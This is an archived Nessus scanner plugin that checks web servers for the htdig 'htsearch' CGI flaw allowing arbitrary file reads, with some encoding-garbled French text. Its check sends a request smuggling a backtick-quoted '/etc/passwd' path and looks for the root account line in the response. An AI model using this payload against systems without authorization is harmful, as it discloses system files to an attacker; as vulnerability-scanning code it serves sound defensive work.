home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / htdig.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  80 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10105);
  10.  script_bugtraq_id(1026, 867);
  11.  script_version ("$Revision: 1.21 $");
  12.  script_cve_id("CVE-1999-0978", "CVE-2000-0208");
  13.  name["english"] = "htdig";
  14.  name["francais"] = "htdig";
  15.  script_name(english:name["english"], francais:name["francais"]);
  16.  
  17.  desc["english"] = "The 'htsearch' CGI,
  18. which is part of the htdig package, allows 
  19. a malicious user to view any file on the target 
  20. computer.
  21.  
  22. Solution : Upgrade to a newer version (3.1.5 or newer)
  23.        available at http://www.htdig.org
  24. Risk factor : High
  25. ";
  26.  
  27.  desc["francais"] = "Le CGI 'htsearch', qui
  28. appartient au package htDig, permet α un 
  29. pirate de lire n'importe quel fichier sur la machine cible.>
  30.  
  31. Facteur de risque : ElevΘ
  32. Solution : Mettez α jour htdig en 3.1.5 ou plus rΘcent.
  33.        htdig est disponible α http://www.htdig.org";
  34.  
  35.  script_description(english:desc["english"], francais:desc["francais"]);
  36.  
  37.  summary["english"] = "Checks if htdig is vulnerable";
  38.  summary["francais"] = "DΘtermine sihtdig est vulnΘrable";
  39.  
  40.  script_summary(english:summary["english"], francais:summary["francais"]);
  41.  
  42.  script_category(ACT_GATHER_INFO);
  43.  
  44.  
  45.  script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
  46.         francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
  47.  family["english"] = "CGI abuses";
  48.  family["francais"] = "Abus de CGI";
  49.  script_family(english:family["english"], francais:family["francais"]);
  50.  script_dependencie("find_service.nes", "no404.nasl");
  51.   script_require_ports("Services/www", 80);
  52.  exit(0);
  53. }
  54.  
  55. #
  56. # The script code starts here
  57. #
  58.  
  59. include("http_func.inc");
  60. include("http_keepalive.inc");
  61.  
  62.  
  63. port = get_http_port(default:80);
  64.  
  65. if(!get_port_state(port))exit(0);
  66.  
  67. foreach dir (cgi_dirs())
  68. {
  69.  req = string(dir, "/htsearch?exclude=%60/etc/passwd%60");
  70.  req = http_get(item:req, port:port);
  71.  result = http_keepalive_send_recv(port:port, data:req);
  72.  if( result == NULL ) exit(0);
  73.  if(egrep(pattern:".*root:.*:0:[01]:.*", string:result)){
  74.      security_hole(port);
  75.     exit(0);
  76.     }
  77. }
  78.  
  79.  
  80.